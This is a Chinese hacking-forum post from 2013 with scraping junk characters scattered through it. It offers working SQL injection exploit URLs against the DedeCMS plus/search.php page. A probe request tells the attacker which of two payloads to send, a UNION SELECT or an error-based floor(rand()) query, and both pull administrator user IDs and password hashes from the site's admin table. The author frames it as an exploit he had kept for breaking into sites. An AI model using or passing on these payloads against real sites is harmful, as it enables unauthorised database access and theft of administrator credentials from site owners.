找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2378|回复: 0
打印 上一主题 下一主题

[通杀]dedecms plus/search.php 注入漏洞利用EXP

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-21 08:45:22 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
转载不加作者名的没JJ
. [" Q: _7 r) U6 J* A& V* a9 \; E+ M! T6 \
哎。没意识,我一个月前就发现了这个漏洞,一直也没去黑站  放那 现在狗卵的什么 知道创宇 发出来了。郁闷。。可惜了我的洞辛苦看了2天的dedecms漏洞就这样没了。( o8 A7 X5 `5 y& c. {! F+ @

, i) `; _* {) H  J. `# U  a既然已经发出来了,我就把我自己搞的exp发下吧。。唉。
2 o  M6 S' [6 {' _: H- N! o. b% D; y" P/ N: t3 }& W
我一般是这样测试的:
  K2 v1 X/ {- i8 ~8 A
- e* [  E$ H6 r提交 xx.com/plus/search.php?keyword=as&typeArr[ uNion ]=a
' `7 W0 V+ \3 i8 i/ w
" a$ D% O6 D* a% b3 J  A# U$ r7 h' |转载不加作者名的没JJ9 G7 b/ Y/ a4 [

7 E# R  e, E$ f% W& ]1 B+ `作者:鬼哥
6 m$ V. U- F# ]3 G' |- O( x( T4 y; M5 r6 d$ y2 i9 K
. M$ `* f9 k  l

% A& k8 u7 Y8 I. u5 G1 }看结果如果提示
- V* t# ^2 F1 Q4 s& D( p! Y0 @$ z/ c$ @
Safe Alert: Request Error step 2 !) p: U2 Z' C" M& L
+ F6 ~( ]' `. v, w! B
那么直接用下面的exp, u" M& {, `3 W+ P
& f+ Z$ `2 H. m" J+ z
xx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\'`+]=a2 c$ J8 ?, m& G# S' k; L) H( \

8 U" \' O2 u& X5 P- m. I; E  c0 I- {: v% R7 A* n: y
看结果如果提示; D8 l: d+ O0 x  \) m
- F* E% v; x/ S* ^5 Z9 s4 A
Safe Alert: Request Error step 1 !+ m: g5 V5 Q$ g; F

; D& S3 ~7 ?. Q& J+ m) Z那么直接用下面的exp
* ~2 u3 ?7 J3 L  B6 `9 t. y) U; x. A3 ]% O) c. W9 A
xx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\'`+]=a
, }+ k8 P/ R5 O) o5 j' V
) z9 b8 a3 R! v4 [, c8 h$ n4 e8 E: d/ ^, `, Y
如果正常显示证明漏洞不存在了。
. ~# z- v0 U9 ?% `/ g+ {) Q1 j6 \2 K5 k6 k' c$ K* g' D
转载不加作者名的没JJ
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表